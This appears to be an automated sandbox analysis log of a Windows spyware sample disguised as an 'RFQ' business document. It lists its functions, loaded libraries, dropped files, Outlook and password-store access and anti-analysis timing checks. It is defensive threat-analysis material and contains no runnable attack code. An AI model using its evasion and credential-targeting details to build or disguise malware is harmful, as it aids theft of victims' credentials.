            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B056604_2_36B05660
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B056504_2_36B05650
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B086404_2_36B08640
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B067B04_2_36B067B0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B00FA84_2_36B00FA8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0AFF74_2_36B0AFF7
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0AFF84_2_36B0AFF8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0AFE84_2_36B0AFE8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B067C04_2_36B067C0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B05F104_2_36B05F10
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B05F014_2_36B05F01
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B03F704_2_36B03F70
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B03F604_2_36B03F60
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B01CB04_2_36B01CB0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B074B84_2_36B074B8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B01CA04_2_36B01CA0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B074C84_2_36B074C8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B06C184_2_36B06C18
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B014004_2_36B01400
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B06C094_2_36B06C09
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B04DB04_2_36B04DB0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B04DA04_2_36B04DA0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B09D004_2_36B09D00
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B025604_2_36B02560
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B025504_2_36B02550
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B05AB84_2_36B05AB8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B05AA84_2_36B05AA8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0BA974_2_36B0BA97
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B052074_2_36B05207
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B052084_2_36B05208
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B032684_2_36B03268
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B043B94_2_36B043B9
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B013F04_2_36B013F0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B043C84_2_36B043C8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B03B184_2_36B03B18
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B03B084_2_36B03B08
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B063684_2_36B06368
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0A3524_2_36B0A352
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B063584_2_36B06358
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B07B4F4_2_36B07B4F
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B048204_2_36B04820
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B048104_2_36B04810
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B070704_2_36B07070
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B070614_2_36B07061
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B018584_2_36B01858
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B000404_2_36B00040
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B018484_2_36B01848
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B029B84_2_36B029B8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0A9A04_2_36B0A9A0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B029A84_2_36B029A8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B051F84_2_36B051F8
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0F1304_2_36B0F130
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B0F1204_2_36B0F120
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B021084_2_36B02108
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B2D6C14_2_36B2D6C1
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B2E7904_2_36B2E790
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_36B283284_2_36B28328
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: String function: 00402BBF appears 51 times
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2990922769.0000000033ED7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs RFQ December-January Forcast and TCL.exe
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2972173714.0000000003BB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ December-January Forcast and TCL.exe
            Source: RFQ December-January Forcast and TCL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: RFQ December-January Forcast and TCL.exe, 00000000.00000002.2056548756.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Khans\Trabascolo.MisHarlekinmnster.Sln
            Source: RFQ December-January Forcast and TCL.exe, 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: Callers\user\AppData\Local\Temp\nskEAE7.tmp\System.dllast.inf i 0)i.r5ving\Harlekinmnster.SlnstoxtC:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dllrapiditetens\fremtving\Khans\Trabascolo.MisC:\Users\user\AppData\Local\Temp\nskEAE7.tmp, i 0)40)p.r2x80, i 0)i.r5C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dll.ini
            Source: RFQ December-January Forcast and TCL.exe, 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Harlekinmnster.Sln944
            Source: RFQ December-January Forcast and TCL.exe, 00000000.00000002.2056548756.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Harlekinmnster.Sln
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeMutant created: NULL
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeFile created: C:\Users\user\AppData\Local\Temp\nseE9DC.tmpJump to behavior
            Source: RFQ December-January Forcast and TCL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034165000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034155000.00000004.00000800.00020000.00000000.sdmp, RFQ December-January Forcast and TCL.exe, 00000004.00000002.2991049538.0000000034173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ December-January Forcast and TCL.exeVirustotal: Detection: 29%
            Source: RFQ December-January Forcast and TCL.exeReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeFile read: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess created: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess created: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: RFQ December-January Forcast and TCL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2057192020.000000000356F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeFile created: C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeAPI/Special instruction interceptor: Address: 36735BB
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeAPI/Special instruction interceptor: Address: 23335BB
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeRDTSC instruction interceptor: First address: 36338F2 second address: 36338F2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F435124B3F8h 0x00000006 test eax, edx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeRDTSC instruction interceptor: First address: 22F38F2 second address: 22F38F2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F435124BA88h 0x00000006 test eax, edx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exeMemory allocated: 34070000 memory reserve | memory write watchJump to behavior
